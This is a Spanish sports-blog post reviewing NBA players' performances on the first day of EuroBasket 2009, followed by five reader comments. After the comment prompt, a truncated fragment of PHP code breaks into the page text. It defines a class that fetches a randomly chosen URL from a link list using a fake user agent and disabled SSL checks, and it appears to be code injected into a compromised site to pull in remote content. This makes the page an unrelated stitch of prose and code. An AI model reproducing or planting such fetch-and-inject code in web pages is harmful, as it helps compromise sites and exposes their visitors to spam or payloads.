EuroNBAsket: Jornada 1

08 de September de 2009 por TheDeerHunter

El resumen de la primera jornada de torneo servirá para inaugurar el seguimiento que en TJNBA haremos de la actuación de los muchos jugadores de la NBA presentes en el Eurobasket de Polonia. Veamos qué tal se les dio el debut…

Extraordinaria actuación de “el eterno” Turkoglu e Ilyasova frente a Lituania. 36 puntos, 8 rebotes entre ambos que se unieron al gran tramo final del base suplente Arslan para ofrecernos toda una declaración de propósitos. Hay que ver que par de años nos está ofreciendo el nuevo alero de los Raptors… y no parece que vaya precísamente a frenarse el año de “su” Mundial a pesar de haber roto la banca con su nuevo contrato. Calderón estará frotándose las manos.

También fue memorable el partidazo que se marcó Nenad Krstic contra los grandes favoritos. No recordamos haberle visto hacer un partido tan sobresaliente como el de anoche. Sus 17 puntos no reflejan el clínic de juego al poste, inteligencia, desmarques, colocación, velocidad de pies… que nos ofreció anoche el serbio. Su defensa también fue magnífica, aunque en esta ocasión los hermanos Gasol mostraron un punto de forma francamente mejorable y no representaron la amenaza que se les presupone. En cualquier caso estuvo todo el partido muy agresivo, implicado y con una excepcional capacidad de anticipación. Vamos, todo lo contrario que hemos visto en los pívots serbios durante los últimos campeonatos.

En Francia, Tony Parker (19-6-4), Mr T-uriaf (15-14-3) y Nicolas Batum (12-8-2) sobresalieron. Y sin embargo aún les costó doblegar a unos alemanes que dieron más guerra de la que todos pensábamos. Boris Diaw y Mahinmi estuvieron bastante más discretos que sus compañeros.

El último gran triunfador NBA de la jornada fue Marcin Gortat, con unos portentosos registros de 17 puntos, 10 rebotes y, sobre todo, 5 taponacos como 5 soles. Pero es que además, a su lado, los otros 4 titulares Polacos se salieron tumbando a los Búlgaros, que bastante hicieron con no llevarse una paliza de las que duelen.

Y vayamos con los premios del día a repartir entre los jugadores NBA presentes (lo siento, Eliyahu).

MVP: Podría ser el polaco Gortat, quien parece que está también en la cresta de la ola por el contratazo engatillado en verano. Si se dedica a hacer este tipo de actuaciones junto a Dwight Howard el resto lo tiene crudo. De todas formas, por la trascendencia de la victoria y la dificultad de la hazaña me quedaría con el partidazo de Nenad Krstic, que estuvo sencillamente sublime. Nos hizo recordar “a fuego” cómo se las gasta un buen alumno de la escuela yugoslava… para que nos dejemos de mirar el ombligo.

La Sorpresa: Pues hay varias… pero tenemos debilidad por Turiaf disfrazado de pívot dominante contra las torres alemanas (aunque tampoco es que sean Shaquille O’neal ninguno, vamos)

La decepción: Extremadamente flojos los hermanos Gasol, sobre todo Marc, que no ha salido de ninguna lesión que sepamos… Aunque lo de los tiros libres del campeón lagunero habrá que hacerselo mirar. Si le sigue molestando el dedo, España tiene un problema grave. Andris Biedrins también estuvo bastante apagado contra Rusia… A ver si va a haber que fichar a Kambala para la NBA.

El mayor esfuerzo en vano. Cuidadito con Mensah-Bonsu que está como un tiro. 16 puntos 6 rebotes, 2 asistencias y 2 tapas… No fue suficiente para hacer sufrir a los eslovenos, pero tal y como están los aleros españoles igual les puede hacer un traje. ¡Que vuelva Rudy, por diosss!!!

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    ¡¡Grande ese Ronny!!

    Y pequeños, minúsculos, esos Gasol. En fin, otro día será.

      Citar

  2. Txusma dice:
    #2

    Cruzandonos en la segunda fase con Lituania y Turquia este tropiezo se antoja un tanto grave aunq deberiamos pasar a los octavos sin problemas. Esperemos que sirva como leccion

      Citar

  3. TheDeerHunter dice:
    #3

    Bueno, yo creo que lo que pasó ayer… uno de los muchos motivos del tropiezo debería hacernos reflexionar sobre lo mucho que se ha hablado del fracaso de los NBA de otros países en este tipo de competiciones, asociándolo al “engañoso” nivel NBA o a la actitud de las estrellitas.
    No creo que Marc ni Gasol hayan perdido el nivel, ni mucho menos la actitud… está claro que para un NBA resulta complicado encontrar el tono físico a estas alturas. Hay excepciones, por supuesto. Cada caso es un mundo, pero la regla general me parece que es esa.

      Citar

  4. TheDeerHunter dice:
    #4

    Alucinante… Alemania se funde a Rusia
    y Eslovenia y Polonia llevan camino de hacer lo propio con Serbia y Lituania respectivamente

    no sólo nosotros tropezamos, vaya

      Citar

  5. toni dice:
    #5

    Polonia gana a Lituania y los eslovenos se comen a Serbia, ¿es ésto el mundo al revés?

    A ver si hay suerte y con rudy por lo menos no nos comen en intensidad, ayer Llull lo hizo muy bien y lo de los libres de Pau… Pero vamos a achacarlo a la falta de ritmo y a la caraja que llevaba España. El Mejor fué Felipe a ver si hoy se luce otra vez. El acierto en el tiro de 3 brilló por su ausencia, hoy tienen que entrar sinó el viernes tenemos a los chicos en Barajas.

    Secundarios en USA como Gortat (Pese al pedazo de contrato que ha firmado), Krstic o Turiaf estan en plan dominadores, ¡qué grandes!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>